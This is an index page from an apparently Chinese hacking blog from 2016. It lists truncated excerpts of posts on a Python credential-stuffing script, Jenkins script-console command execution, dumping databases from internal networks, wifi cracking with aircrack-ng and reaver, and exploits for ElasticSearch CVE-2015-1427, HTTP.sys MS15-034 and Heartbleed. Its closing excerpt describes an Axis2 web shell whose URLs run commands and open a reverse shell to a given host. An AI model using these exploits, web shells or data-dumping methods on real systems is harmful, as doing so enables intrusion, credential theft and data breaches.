wiz笔记 python撞库代码

wiz笔记 python撞库代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 11...
2016年05月09日 汪洋大海 暂无评论 喜欢 0 阅读 3,050 views 次 阅读全文

Jenkins脚本命令执行漏洞小总结

Jenkins脚本命令执行漏洞小总结
1,系统介绍 Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 2,漏洞描述 Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,功能如图: jenkins命令执行漏洞 利用该功能,可以执行系统命令,例如执行”whoami”命令,如图所示: 命令执行漏洞 该功能实际...
2016年05月07日 汪洋大海 暂无评论 喜欢 0 阅读 5,779 views 次 阅读全文

SQL大型内部网络脱裤

SQL大型内部网络脱裤
【此话是本博主说的:千万不要碰任何公司的任何敏感数据,如果人家告你,那么你必定败诉,脱裤违法,超过2000条,基本就可以蹲一阵了。】   首先声明上述两种方法,有很多朋友已经知道或有更好的办法脱裤。 关于脱裤个人观点是能简单则简单。 先声明大致脱裤环境: 1、准备脱裤数据量在千万级别 2、有WEB端SHELL 3、数据库服务器在内网只允许WEB端IP登录等 4、无ROOT密...
2016年05月04日 汪洋大海 暂无评论 喜欢 0 阅读 6,332 views 次 阅读全文

nmap脚本使用总结

nmap脚本使用总结
本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。 0x01 nmap按脚本分类扫描 nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描: auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 ...
2016年05月03日 汪洋大海 暂无评论 喜欢 0 阅读 3,005 views 次 阅读全文

树莓派(raspberrypi)安装aircrack-ng,reaver及wifi破解教程

树莓派(raspberrypi)安装aircrack-ng,reaver及wifi破解教程
硬件环境 树莓派B+一个(我用的是debian环境) PC一台(或其它设备直接操作PI就行) 无线网卡(能用就行,不过强大的无线网卡会事半功倍,我用的3070) 安装依赖包 sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion sudo apt-get install libnl-3-200 libnl-3-dev libnl-3-d...
2016年04月30日 汪洋大海 暂无评论 喜欢 0 阅读 5,261 views 次 阅读全文

树莓派 安装 kali linux需要以下设置

树莓派 安装 kali linux需要以下设置
树莓派可以说是极客的最爱,可以根据不同的需求去做定制。 前文《使用树莓派和kali Linux打造便携式渗透套件》讲了一些使用树莓派的基础,主要侧重于将树莓派当作一个物理后门使用。我则更喜欢将树莓派当作一个服务器,去做一些metasploit会话反弹,xssme等一些轻量级的渗透测试业务。 硬件: raspberry pi 2 32G SD卡 软件: kali-2.0.1-rpi 下载地址: http://images.kali.or...
2016年04月30日 汪洋大海 暂无评论 喜欢 0 阅读 6,568 views 次 阅读全文

CVE-2015-1427 EXP pthon POC

CVE-2015-1427 EXP pthon POC
首先说说代码来源:https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch 非常霸道的脚本。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 #!/bin/python2 # coding: utf-8 # Author: Darren Martyn, Xiphos Research Ltd. # V...
2016年04月20日 汪洋大海 暂无评论 喜欢 0 阅读 3,129 views 次 阅读全文

http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)

http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)
本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/ 本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。 http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp 网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用de POC。 把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻...
2016年04月20日 汪洋大海 暂无评论 喜欢 0 阅读 7,873 views 次 阅读全文

OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例
OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把。 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html 1 nmap -sV --script=ssl-heartbleed <target>   若想要批量寻找攻击目标,可以直接扫目标IP段的443端口。...
2016年04月18日 汪洋大海 OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例已关闭评论 喜欢 0 阅读 4,625 views 次 阅读全文

Axis2 Web Shell

Axis2 Web Shell
axis2 web shell 使用介绍: 1、命令执行 http://1.1.1.1/services/config/exec?cmd=whoami (不说了,执行命令。注意:xml换行没有处理好) 2、反弹shell http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 (Linux则使用bash反弹shell,Windows则会进行socket执行shell) 3、文件上传 http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/sh...
2016年04月15日 汪洋大海 暂无评论 喜欢 0 阅读 4,577 views 次 阅读全文